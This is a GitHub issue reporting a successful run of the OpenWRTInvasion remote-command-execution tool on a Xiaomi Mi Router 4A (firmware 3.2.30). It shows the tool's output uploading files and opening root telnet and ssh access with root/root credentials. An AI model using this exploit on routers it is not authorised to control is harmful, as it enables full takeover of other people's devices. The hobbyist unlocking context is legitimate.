[Success] Mi Router 4A Gigabit Edition (R4A) on firmware 3.2.30
symm opened this issue · 0 comments
Reporting success with the following methods:
- The original 0.0.1 offline which got me a shell
- Current master branch on macOS (Ventura):
```
➜ OpenWRTInvasion git:(master) python3 remote_command_execution_vulnerability.py
Router IP address [press enter for using the default 'miwifi.com']: 192.168.31.1
Enter router admin password: {redacted}
There two options to provide the files needed for invasion:
- Use a local TCP file server runing on random port to provide files in local directory script_tools.
- Download needed files from remote github repository. (choose this option only if github is accessable inside router device.)
Which option do you prefer? (default: 1)
router_ip_address: 192.168.31.1
stok: {redacted}
file provider: local file server
start uploading config file...
start exec command...
local file server is runing on 0.0.0.0:49471. root='script_tools'
local file server is getting 'busybox-mipsel' for 192.168.31.1.
local file server is getting 'dropbearStaticMipsel.tar.bz2' for 192.168.31.1.
done! Now you can connect to the router using several options: (user: root, password: root)
- telnet 192.168.31.1
- ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc -o UserKnownHostsFile=/dev/null root@192.168.31.1
- ftp: using a program like cyberduck
```